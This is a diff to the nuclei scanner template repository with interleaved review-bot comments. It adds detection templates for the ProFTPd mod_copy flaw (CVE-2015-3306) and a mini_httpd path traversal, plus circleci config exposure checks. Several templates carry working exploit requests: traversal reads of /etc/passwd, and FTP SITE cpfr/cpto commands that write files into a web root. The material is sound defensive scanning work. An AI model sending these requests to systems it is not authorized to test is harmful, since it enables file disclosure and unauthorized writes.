diff --git a/README.md b/README.md
index 37d784efe8..1ed2f0d10a 100644
--- a/README.md
+++ b/README.md
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates | Counts | Templates | Counts | Templates | Counts |
 | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 |
-| exposures | 61 | technologies | 50 | misconfiguration | 54 |
+| cves | 237 | vulnerabilities | 105 | exposed-panels | 104 |
+| exposures | 63 | technologies | 50 | misconfiguration | 54 |
 | workflows | 23 | miscellaneous | 16 | default-logins | 19 |
 | exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
 | helpers | 2 | takeovers | 1 | - | - |
-**75 directories, 712 files**.
+**75 directories, 716 files**.
diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml
index aa427af7be..68b9e4ba42 100644
--- a/cves/2008/CVE-2008-2650.yaml
+++ b/cves/2008/CVE-2008-2650.yaml
@@ -9,6 +9,7 @@ requests:
 - raw:
 - |
 GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
+ Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
 matchers-condition: and
diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml
new file mode 100644
index 0000000000..8c9faa4123
--- /dev/null
+++ b/cves/2015/CVE-2015-3306.yaml
@@ -0,0 +1,27 @@
+id: CVE-2015-3306
+
+info:
+ name: ProFTPd RCE
+ author: pd-team
+ severity: high
+ reference: https://github.com/t0kx/exploit-CVE-2015-3306
+ tags: cve,cve2015,ftp,rce,network
+
+network:
+ - inputs:
+ - data: "site cpfr /proc/self/cmdline\r\n"
+ read: 1024
+ - data: "site cpto /tmp/.{{randstr}}\r\n"
+ read: 1024
+ - data: "site cpfr /tmp/.{{randstr}}\r\n"
+ read: 1024
+ - data: "site cpto /var/www/html/{{randstr}}\r\n"
+ host:
+ - "{{Hostname}}:21"
+
+ read-size: 1024
+ matchers:
+ - type: word
+ words:
+ - "Copy successful"
+ part: raw
\ No newline at end of file
diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml
new file mode 100644
index 0000000000..59a103811e
--- /dev/null
+++ b/cves/2018/CVE-2018-18778.yaml
@@ -0,0 +1,24 @@
+id: CVE-2018-18778
+
+info:
+ name: mini_httpd Path Traversal
+ author: dhiyaneshDK
+ severity: high
+ reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
+ tags: cve,cve2018,lfi
+requests:
+ - raw:
+ - |+
+ GET /etc/passwd HTTP/1.1
+ Host:
+ Content-Length: 4
+
+ unsafe: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml
index 27c0bf4a94..8a92db1344 100644
--- a/cves/2019/CVE-2019-11869.yaml
+++ b/cves/2019/CVE-2019-11869.yaml
@@ -33,6 +33,7 @@ requests:
 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
 Upgrade-Insecure-Requests: 1
+ req-condition: true
 matchers-condition: and
 matchers:
 - type: dsl
diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml
index 771b21408a..a8cfb6d388 100644
--- a/exposed-panels/identityguard-selfservice-entrust.yaml
+++ b/exposed-panels/identityguard-selfservice-entrust.yaml
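Review bot: The last input, `site cpto /var/www/html/{{randstr}}`, copies the contents of `/proc/self/cmdline` into the target's document root and nothing in the template removes it afterwards, so every scan leaves a scanner-written file on a web-served path; the earlier `cpto` into `/tmp/.{{randstr}}` presumably already produces the `Copy successful` reply the matcher keys on, so the web-root copy (and the `cpfr /tmp/.{{randstr}}` that feeds it) can be dropped, and if they are kept the template should state in a `description:` that the check writes files to the host so operators can exclude it. That final `data:` entry is also the only one without a `read: 1024`, so whether its reply ever reaches the matcher depends on how `read-size` is applied to the last input — worth confirming. The chain additionally relies on `{{randstr}}` expanding to the same value in every input; if it is regenerated per input the second `cpfr` targets a file that does not exist and the match silently comes from the `/tmp` copy alone, so that is worth verifying as well.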
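Review bot: `Content-Length: 4` is sent on a GET with an empty body, so a server that honours the header may wait for four bytes that never arrive until nuclei's timeout instead of replying, and as far as this bug is known the empty `Host:` line, not the length header, is what exercises the virtual-host traversal; unless the header was found to be required, drop it and send `GET /etc/passwd HTTP/1.1`, `Host:`, blank line. The empty `Host:` appears to be the entire trigger and is presumably why `unsafe: true` is set (so nuclei does not normalise the request), but nothing records that, so add `description: Sends a request with an empty Host header; vulnerable mini_httpd resolves the path against the filesystem root. Do not change Host: to {{Hostname}}.` under `info`. Every other template in this change also separates `info` from `requests` with a blank line; the missing one after `tags:` here is cosmetic but worth matching.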
@@ -11,6 +11,7 @@ requests:
 - "{{BaseURL}}/IdentityGuardSelfService/"
 - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
+ req-condition: true
 redirects: true
 max-redirects: 2
 matchers:
diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml
new file mode 100644
index 0000000000..294bb13505
--- /dev/null
+++ b/exposures/configs/circleci-config.yaml
@@ -0,0 +1,24 @@
+id: circleci-config
+
+info:
+ name: circleci config.yml exposure
+ author: geeknik
+ severity: low
+ reference: https://circleci.com/docs/2.0/sample-config/
+
+requests:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/.circleci/config.yml"
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'regex("^version: ", body) && contains(body, "jobs:") == true'
+
+ - type: status
+ status:
+ - 200
diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml
new file mode 100644
index 0000000000..2d6eb7e18a
--- /dev/null
+++ b/exposures/configs/circleci-ssh-config.yaml
@@ -0,0 +1,26 @@
+id: circleci-ssh-config
+
+info:
+ name: circleci ssh-config exposure
+ author: geeknik
+ severity: low
+
+requests:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/.circleci/ssh-config"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Host"
+ - "HostName"
+ - "IdentityFile"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml
index 1a2db42b20..3c3c4a7e28 100644
--- a/fuzzing/iis-shortname.yaml
+++ b/fuzzing/iis-shortname.yaml
@@ -46,8 +46,8 @@ requests:
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 Accept-Language: en-US,en;q=0.9
+ req-condition: true
 matchers:
 - type: dsl
- name: iis-scan
 dsl:
 - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
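Review bot: `regex("^version: ", body)` is anchored without the multiline flag, so it only matches when `version:` is the very first bytes of the body; a config that opens with a comment, a `---` document marker or a BOM is missed even though `jobs:` is present, and the `== true` after `contains(...)` is a redundant comparison. Change the DSL line to `- 'regex("(?m)^version: ", body) && contains(body, "jobs:")'` so the key is accepted at any line start. The template also carries no `description:` or `tags:` (the CVE templates in this same change have `tags:`, and exposures are normally selected by tag), so add `description: Detects a publicly readable .circleci/config.yml, which can reveal build steps, internal hostnames and hard-coded credentials.` and `tags: exposure,config,circleci` under `info`.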
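Review bot: In the word matcher `Host` is a substring of `HostName`, so with `condition: and` it never adds a constraint and only makes the check look stricter than it is; drop it, and since the remaining words are bare tokens that can appear in any 200 landing page served for an unknown path, consider a regex matcher anchored to directive lines (something like `(?m)^\s*IdentityFile\s+\S+`) so only a real ssh config fires. The template also has no `description:`, `reference:` or `tags:` while the sibling `circleci-config` template in this change carries a `reference:` and the CVE templates carry `tags:`, so add `description: Detects an exposed .circleci/ssh-config, which reveals internal hostnames and the private-key paths used by the build.` and `tags: exposure,config,circleci` under `info`.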
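Review bot: The DSL on the last line mixes `&&` and `||` without parentheses, so whether it means the intended pairing depends on the expression engine giving `&&` the higher precedence, and the inconsistent spacing (`status_code_1!=404` versus `status_code_3 != 404`) makes the two halves hard to compare by eye; spell the grouping out as `"(status_code_1 != 404 && status_code_2 == 404) || (status_code_3 != 404 && status_code_4 == 404)"`. A short comment above the new `req-condition: true` saying that it is what makes the per-request `status_code_N` values available to the DSL would also help, since that is presumably why the field is being added to several templates in this change. The enclosing `requests` entry begins before the hunk.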
diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml
index 33f999e808..1e10bad487 100644
--- a/misconfiguration/put-method-enabled.yaml
+++ b/misconfiguration/put-method-enabled.yaml
@@ -19,6 +19,7 @@ requests:
 GET /testing-put.txt HTTP/1.1
 Content-Type: text/plain
+ req-condition: true
 matchers:
 - type: dsl
 name: multi-req
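Review bot: The raw `GET /testing-put.txt HTTP/1.1` request in this hunk carries no `Host:` header — `Content-Type: text/plain` follows the request line directly — while the CVE-2008-2650 hunk in this same change adds `Host: {{Hostname}}` to a raw request; unless nuclei fills it in from the target URL (worth confirming), add `Host: {{Hostname}}` after the request line so virtual-hosted targets serve the right document. The PUT that creates `testing-put.txt` lies outside this hunk, so it is not visible whether the template ever deletes the file it uploads; a `description:` noting that a successful check leaves `/testing-put.txt` on the target would let operators treat it as intrusive. The enclosing `requests` entry begins before the hunk.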